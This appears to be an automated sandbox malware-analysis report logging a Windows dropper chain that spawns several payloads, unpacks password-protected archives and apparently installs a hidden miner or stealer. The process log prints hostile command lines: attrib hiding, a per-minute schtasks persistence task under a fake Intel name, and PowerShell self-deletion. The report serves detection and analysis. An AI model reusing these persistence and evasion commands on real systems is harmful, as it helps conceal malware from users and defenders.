Source: random[1].exe.5.dr	Static PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
Source: 53f7160658.exe.5.dr	Static PE information: Section: ZLIB complexity 0.9950706845238095
Source: 53f7160658.exe.5.dr	Static PE information: Section: fsrfimey ZLIB complexity 0.9949264117406195
Source: random[1].exe0.5.dr	Static PE information: Section: gmgvfxzz ZLIB complexity 0.9945301242795389
Source: 53fe16f582.exe.5.dr	Static PE information: Section: gmgvfxzz ZLIB complexity 0.9945301242795389
Source: random[2].exe.5.dr	Static PE information: Section: ZLIB complexity 0.997431506849315
Source: random[2].exe.5.dr	Static PE information: Section: sqzmxkkd ZLIB complexity 0.9945892532972732
Source: a98b6b83c7.exe.5.dr	Static PE information: Section: ZLIB complexity 0.997431506849315
Source: a98b6b83c7.exe.5.dr	Static PE information: Section: sqzmxkkd ZLIB complexity 0.9945892532972732
Source: random[1].exe1.5.dr	Static PE information: Section: ZLIB complexity 0.9973779965753424
Source: random[1].exe1.5.dr	Static PE information: Section: vpedfbia ZLIB complexity 0.9946712698889223
Source: e66237da20.exe.5.dr	Static PE information: Section: ZLIB complexity 0.9973779965753424
Source: e66237da20.exe.5.dr	Static PE information: Section: vpedfbia ZLIB complexity 0.9946712698889223
Source: random[2].exe2.5.dr	Static PE information: Section: cllxmxcj ZLIB complexity 0.9934709821428571
Source: 318ea9f50d.exe.5.dr	Static PE information: Section: cllxmxcj ZLIB complexity 0.9934709821428571

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@68/48@88/11

Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe

Code function: 7_2_00409606 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

7_2_00409606

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001DAC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		11_2_001DAC74
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 11_2_001E1D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,		11_2_001E1D04

Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe

Code function: 7_2_0040122A GetDiskFreeSpaceExW,SendMessageW,

7_2_0040122A

Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe

Code function: 7_2_004092C1 GetDlgItem,GetDlgItem,SendMessageW,GetDlgItem,GetWindowLongW,GetDlgItem,SetWindowLongW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow,

7_2_004092C1

Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe

Code function: 7_2_004020BF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,

7_2_004020BF

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"

Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: a98b6b83c7.exe, 00000025.00000003.3270680937.000000000577A000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3270464894.0000000005796000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

Virustotal: Detection: 56%

Source: e66237da20.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe	String found in binary or memory: RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeRT

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe "C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe "C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe"
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Windows\System32\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe "C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe "C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe "C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe "C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe "C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe "C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe "C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe "C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
